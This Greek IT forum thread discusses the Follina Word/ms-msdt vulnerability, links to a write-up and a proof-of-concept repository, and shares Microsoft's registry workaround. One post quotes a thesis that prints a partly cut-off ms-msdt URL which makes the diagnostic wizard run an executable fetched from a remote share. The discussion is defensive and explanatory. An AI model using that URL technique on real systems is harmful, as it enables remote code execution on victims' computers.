Εμφάνιση 1-13 από 13
  1. #1
    Εγγραφή
    22-09-2003
    Μηνύματα
    81.687
    Downloads
    218
    Uploads
    48
    Άρθρα
    6
    Τύπος
    VDSL2
    Ταχύτητα
    204800/20480
    ISP
    Wind
    Router
    Technicolor DGA4130
    SNR / Attn
    6(dB) / 2.8(dB)
    Path Level
    Interleaved
    Security_new
    Αρκετοί ερευνητές, έχουν παρατηρήσει ένα νέο είδος επίθεσης, το οποίο παρακάμπτει την προστατευμένη προβολή της Microsoft και τις όποιες anti-malware δυνατότητες ανίχνευσης. Ο επιτιθέμενος, χρησιμοποιεί τη λειτουργία απομακρυσμένου προτύπου του Microsoft Word, για την ανάκτηση ενός αρχείου HTML από έναν απομακρυσμένο web-server. Στη συνέχεια, χρησιμοποιώντας το πρωτόκολλο ms-msdt, πετυχαίνει την εκτέλεση Power Shell.

    Υπό κανονικές συνθήκες, τα αρχεία που προέρχονται από δυνητικά μη ασφαλείς τοποθεσίες, ανοίγουν μόνο για ανάγνωση ή σε προστατευμένη προβολή. Ωστόσο, στην περίπτωση αυτή, μπορεί εύκολα να παρακαμφθεί με την αλλαγή του εγγράφου σε αρχείο Rich Text Format (RTF). Με τον τρόπο αυτό, ο κώδικας, μπορεί να εκτελεστεί χωρίς να ανοίξει το έγγραφο, μέσω της καρτέλας προεπισκόπησης στην εξερεύνηση.

    MalwareBytes

    Έξτρα πηγές

    https://doublepulsar.com/follina-a-m...y-1a47fce5629e

    https://github.com/JohnHammond/msdt-follina

  2. #2
    Εγγραφή
    27-05-2006
    Περιοχή
    Άγιοι Ανάργυροι
    Ηλικία
    52
    Μηνύματα
    12.673
    Downloads
    20
    Uploads
    1
    Τύπος
    VDSL2
    Ταχύτητα
    100/10 - 600/120
    ISP
    Cosmote VDSL - 5G
    DSLAM
    ΟΤΕ - Ν. ΦΙΛΑΔΕΛΦΕΙΑ
    Router
    UntangleVM on esxi
    Άρα? ξηλώνουμε το preview στα email σαν λύση?
    There's no substitute for experience
    CorollaClub

  3. #3
    Εγγραφή
    02-04-2010
    Μηνύματα
    13.063
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Παράθεση Αρχικό μήνυμα από BlueChris Εμφάνιση μηνυμάτων
    Άρα? ξηλώνουμε το preview στα email σαν λύση?
    Βγήκε workaround.

    https://msrc-blog.microsoft.com/2022...vulnerability/
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  4. #4
    Εγγραφή
    27-05-2006
    Περιοχή
    Άγιοι Ανάργυροι
    Ηλικία
    52
    Μηνύματα
    12.673
    Downloads
    20
    Uploads
    1
    Τύπος
    VDSL2
    Ταχύτητα
    100/10 - 600/120
    ISP
    Cosmote VDSL - 5G
    DSLAM
    ΟΤΕ - Ν. ΦΙΛΑΔΕΛΦΕΙΑ
    Router
    UntangleVM on esxi
    Παράθεση Αρχικό μήνυμα από Zus Εμφάνιση μηνυμάτων
    Οκ thx, το πέρασα σε όλους μέσο AD και τους έστειλα ένα email απλά να ανοιγοκλείσουν το outlook...
    Δεν πιστεύω να θέλει και reboot ε?
    There's no substitute for experience
    CorollaClub

  5. #5
    Εγγραφή
    02-04-2010
    Μηνύματα
    13.063
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Παράθεση Αρχικό μήνυμα από BlueChris Εμφάνιση μηνυμάτων
    Οκ thx, το πέρασα σε όλους μέσο AD και τους έστειλα ένα email απλά να ανοιγοκλείσουν το outlook...
    Δεν πιστεύω να θέλει και reboot ε?
    Έλα ντε
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  6. #6
    Εγγραφή
    30-09-2005
    Ηλικία
    47
    Μηνύματα
    6.974
    Downloads
    6
    Uploads
    0
    Δεν είναι η πρώτη φορά που βγαίνει exploit για τα διάφορα preview. Το οτι το preview αντιμετωπίζεται διαφορετικά απο το (read only) open ποτέ δεν μπόρεσα να το καταλάβω.

  7. #7
    Εγγραφή
    06-07-2005
    Περιοχή
    Νέα Υόρκη
    Ηλικία
    48
    Μηνύματα
    11.616
    Downloads
    6
    Uploads
    2
    Τύπος
    Cable
    Ταχύτητα
    300 Mbps down/10 Mbps up
    ISP
    Spectrum
    Παράθεση Αρχικό μήνυμα από aiolos.01 Εμφάνιση μηνυμάτων
    Δεν είναι η πρώτη φορά που βγαίνει exploit για τα διάφορα preview. Το οτι το preview αντιμετωπίζεται διαφορετικά απο το (read only) open ποτέ δεν μπόρεσα να το καταλάβω.
    Διαφορετικά πράγματα. Το read-only open γίνεται μέσα στο office, το preview γίνεται από άλλα κομμάτια του λειτουργικού. Είναι διαφορετικές υλοποιήσεις.

  8. #8
    Εγγραφή
    27-05-2006
    Περιοχή
    Άγιοι Ανάργυροι
    Ηλικία
    52
    Μηνύματα
    12.673
    Downloads
    20
    Uploads
    1
    Τύπος
    VDSL2
    Ταχύτητα
    100/10 - 600/120
    ISP
    Cosmote VDSL - 5G
    DSLAM
    ΟΤΕ - Ν. ΦΙΛΑΔΕΛΦΕΙΑ
    Router
    UntangleVM on esxi
    Παράθεση Αρχικό μήνυμα από Zus Εμφάνιση μηνυμάτων
    Έλα ντε
    Φάγανε όλοι reboot θέλοντας και μη
    There's no substitute for experience
    CorollaClub

  9. #9
    Εγγραφή
    06-07-2005
    Περιοχή
    Νέα Υόρκη
    Ηλικία
    48
    Μηνύματα
    11.616
    Downloads
    6
    Uploads
    2
    Τύπος
    Cable
    Ταχύτητα
    300 Mbps down/10 Mbps up
    ISP
    Spectrum
    Παράθεση Αρχικό μήνυμα από Zus Εμφάνιση μηνυμάτων
    Τώρα πήγα να το δω αυτό με προσοχή, δεν είναι workaround, αυτό κάνει disable functionality. Θα περιμένω λίγο ακόμα, λογικά θα βγάλουν κάτι πιο εξειδικευμένο σύντομα.

  10. #10
    Εγγραφή
    02-04-2010
    Μηνύματα
    13.063
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Παράθεση Αρχικό μήνυμα από aiolos.01 Εμφάνιση μηνυμάτων
    Δεν είναι η πρώτη φορά που βγαίνει exploit για τα διάφορα preview. Το οτι το preview αντιμετωπίζεται διαφορετικά απο το (read only) open ποτέ δεν μπόρεσα να το καταλάβω.
    Από αναφορές στο Twitter. Thesis 2 χρόνια πίσω

    Σελίδα 29

    In addition, even if file: and similar URLs are filtered out, the attacker can make use of the myriad of
    other URI scheme handlers registered on modern systems. Vulnerabilities in those protocol handlers occur
    from time to time [65]–[68] and sometimes the intended behaviour of those handlers can also be abused.
    Three examples for Windows are given here but similar vectors likely also exist on other systems:

    Windows includes the ms-msdt: protocol that opens the Microsoft Support Diagnostic Tool which
    provides the troubleshooting wizard to diagnose Wi-Fi and audio problems and the like [69]. This
    protocol directly passes the string it is given to the msdt.exe program. The attacker now needs to
    find an included wizard that allows the execution of arbitrary programs, preferably even remote ones.
    The program compatibility wizard fits this description. Luckily for the attacker, all user input can
    also be prefilled from the command line, leading to this URL:
    Κώδικας:
    ms-msdt:-id PCWDiagnostic /moreoptions false /skip true
    /param IT_BrowseForFile="\\live.sysinternals.com\tools\procmon.exe"
    /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO
    - - - Updated - - -

    Παράθεση Αρχικό μήνυμα από tsigarid Εμφάνιση μηνυμάτων
    Τώρα πήγα να το δω αυτό με προσοχή, δεν είναι workaround, αυτό κάνει disable functionality. Θα περιμένω λίγο ακόμα, λογικά θα βγάλουν κάτι πιο εξειδικευμένο σύντομα.
    Για αυτό μιλά και για back up.
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  11. #11
    Εγγραφή
    27-05-2006
    Περιοχή
    Άγιοι Ανάργυροι
    Ηλικία
    52
    Μηνύματα
    12.673
    Downloads
    20
    Uploads
    1
    Τύπος
    VDSL2
    Ταχύτητα
    100/10 - 600/120
    ISP
    Cosmote VDSL - 5G
    DSLAM
    ΟΤΕ - Ν. ΦΙΛΑΔΕΛΦΕΙΑ
    Router
    UntangleVM on esxi
    Παράθεση Αρχικό μήνυμα από tsigarid Εμφάνιση μηνυμάτων
    Τώρα πήγα να το δω αυτό με προσοχή, δεν είναι workaround, αυτό κάνει disable functionality. Θα περιμένω λίγο ακόμα, λογικά θα βγάλουν κάτι πιο εξειδικευμένο σύντομα.
    Εγώ έστειλα σε όλα τα pc με script να σώσουν το registry στο c τους και μετά delete, όπως το λέει η Microsoft δηλαδή. Όταν λυθεί το θέμα θα το κάνω merge σε όλα πάλι.

  12. #12
    Εγγραφή
    30-09-2005
    Ηλικία
    47
    Μηνύματα
    6.974
    Downloads
    6
    Uploads
    0
    Παράθεση Αρχικό μήνυμα από tsigarid Εμφάνιση μηνυμάτων
    Διαφορετικά πράγματα. Το read-only open γίνεται μέσα στο office, το preview γίνεται από άλλα κομμάτια του λειτουργικού. Είναι διαφορετικές υλοποιήσεις.
    Δεν κατάλαβες τι έγραψα. Τι σημασία έχει αν γίνονται απο διαφορετικά κομμάτια; Δεν ψάχνω να βρω τον υπεύθυνο να του ζητήσω το λόγο. Λέω οτι όποιος φτιάχνει preview πρέπει να το κάνει με την ίδια προσοχή στην ασφάλεια με αυτόν που φτιάχνει open. Φαίνεται οτι αρκετές φορές αυτό δεν συμβαίνει.

  13. #13
    Εγγραφή
    06-07-2005
    Περιοχή
    Νέα Υόρκη
    Ηλικία
    48
    Μηνύματα
    11.616
    Downloads
    6
    Uploads
    2
    Τύπος
    Cable
    Ταχύτητα
    300 Mbps down/10 Mbps up
    ISP
    Spectrum
    Παράθεση Αρχικό μήνυμα από aiolos.01 Εμφάνιση μηνυμάτων
    Δεν κατάλαβες τι έγραψα. Τι σημασία έχει αν γίνονται απο διαφορετικά κομμάτια; Δεν ψάχνω να βρω τον υπεύθυνο να του ζητήσω το λόγο. Λέω οτι όποιος φτιάχνει preview πρέπει να το κάνει με την ίδια προσοχή στην ασφάλεια με αυτόν που φτιάχνει open. Φαίνεται οτι αρκετές φορές αυτό δεν συμβαίνει.
    Δεν σε καταλαβαίνω. Δεν ψάχνεις τον υπεύθυνο, αλλά αναγνωρίζεις ότι υπάρχουν 2 υπεύθυνοι και τους κατηγορείς για χρήση διαφορετικών στάνταρ; Κάτι έχω χάσει...

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας